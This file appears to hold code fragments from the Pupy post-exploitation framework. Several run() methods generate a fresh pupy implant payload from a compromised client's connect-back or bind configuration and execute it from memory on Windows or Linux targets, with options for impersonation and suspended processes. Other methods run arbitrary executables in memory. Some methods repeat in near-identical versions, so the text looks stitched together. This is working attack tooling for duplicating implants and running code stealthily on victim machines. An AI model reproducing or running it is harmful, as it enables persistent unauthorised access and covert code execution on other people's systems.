def run(self, args):
self.success("looking for configured connect back address ...")
payload, tpl, _ = pupygen.generate_binary_from_template(
self.client.get_conf(),
self.client.desc['platform'],
arch=self.client.arch)
self.success(
"Generating the payload with the current config from {} - size={}".
format(tpl, len(payload)))
self.success("Executing the payload from memory ...")
if self.client.is_windows():
exec_pe(self,
"",
raw_pe=payload,
interactive=False,
fork=True,
timeout=None,
use_impersonation=args.impersonate,
suspended_process=args.process)
elif self.client.is_linux():
mexec(self,
payload, [],
argv0='/bin/bash',
stdout=False,
raw=True,
terminate=False)
self.success("pupy payload executed from memory")
def run(self, args):
#usefull for bind connection
launcherType, addressPort = self.client.desc['launcher'], self.client.desc['address']
newClientConf = self.client.get_conf()
listeningAddressPort =None #For Bind mode
if self.client.is_windows() and launcherType == "bind":
listeningPort = -1
self.info('The current pupy launcher is using a BIND connection on the Windows target.')
self.info('It is listening on {0} on the target'.format(addressPort))
self.info('For the duplication, you have to choose another port and it will '
'listen on this new specific port on the target')
self.info("Be careful, you have to choose a port which is not used on the target!")
self.info("Be careful to firewall configuration/rules on the target too...")
while listeningPort==-1:
try:
listeningPort = int(input("[?] Give me the listening port to use on the target: "))
except Exception as e:
self.warning("You have to give me a valid port. Try again. ({})".format(e))
listeningAddress = addressPort.split(':')[0]
listeningAddressPort = "{0}:{1}".format(listeningAddress, listeningPort)
self.info("The new pupy instance will listen on {0} on the target".format(listeningAddressPort))
newClientConf = self.client.get_conf()
#Modify the listening port on the conf. If it is not modified,
#the payload will listen on the same port as the inital pupy launcher on the target
newClientConf['launcher_args'][newClientConf['launcher_args'].index("--port")+1] = str(listeningPort)
#Delete --oneliner-host argument, not compatible with exe payload
for pos, val in enumerate(newClientConf['launcher_args']):
if "--oneliner-host" in val:
newClientConf['launcher_args'][pos]=""
newClientConf['launcher_args'][pos+1]=""
self.success("Generating the payload...")
payload, tpl, _ = pupygen.generate_binary_from_template(
self.log,
newClientConf,
self.client.desc['platform'],
arch=self.client.arch
)
self.success("Payload generated with the current config from {} - size={}".format(tpl, len(payload)))
self.success("Executing the payload from memory ...")
if self.client.is_windows():
exec_pe(
self, "", raw_pe=payload, interactive=False,
use_impersonation=args.impersonate, suspended_process=args.process,
wait=False
)
elif self.client.is_linux():
mexec(self, payload, [], argv0='/bin/bash', raw=True)
self.success("pupy payload executed from memory")
if self.client.is_windows() and launcherType == "bind":
self.success(
'You have to connect to the target manually on {0}: '
'try "connect --host {0}" in pupy shell'.format(listeningAddressPort))
def run(self, args):
self.success("looking for configured connect back address ...")
payload, tpl, _ = pupygen.generate_binary_from_template(
self.client.get_conf(),
self.client.desc['platform'],
arch=self.client.arch
)
self.success("Generating the payload with the current config from {} - size={}".format(tpl, len(payload)))
self.success("Executing the payload from memory ...")
if self.client.is_windows():
exec_pe(
self, "", raw_pe=payload,
interactive=False, fork=True, timeout=None,
use_impersonation=args.impersonate, suspended_process=args.process
)
elif self.client.is_linux():
mexec(self, payload, [], argv0='/bin/bash', stdout=False, raw=True, terminate=False)
self.success("pupy payload executed from memory")
def run(self, args):
if self.client.is_windows():
log = exec_pe(
self, args.args,
path=args.path, interactive=args.interactive,
use_impersonation=args.impersonate,
suspended_process=args.suspended_process
)
elif self.client.is_linux():
log = mexec(
self, args.path, args.args,
argv0=args.argv0 or path.basename(args.path),
interactive=args.interactive
)
def run(self, args):
if self.client.is_windows():
log = exec_pe(
self, args.args,
path=args.path, interactive=args.interactive,
fork=args.fork, timeout=args.timeout, use_impersonation=args.impersonate,
suspended_process=args.suspended_process
)
elif self.client.is_linux():
log = mexec(
self, args.path, args.args,
argv0=args.argv0 or path.basename(args.path),
interactive=args.interactive
)
if log and args.log:
with open(args.log, 'wb') as output:
output.write(log)
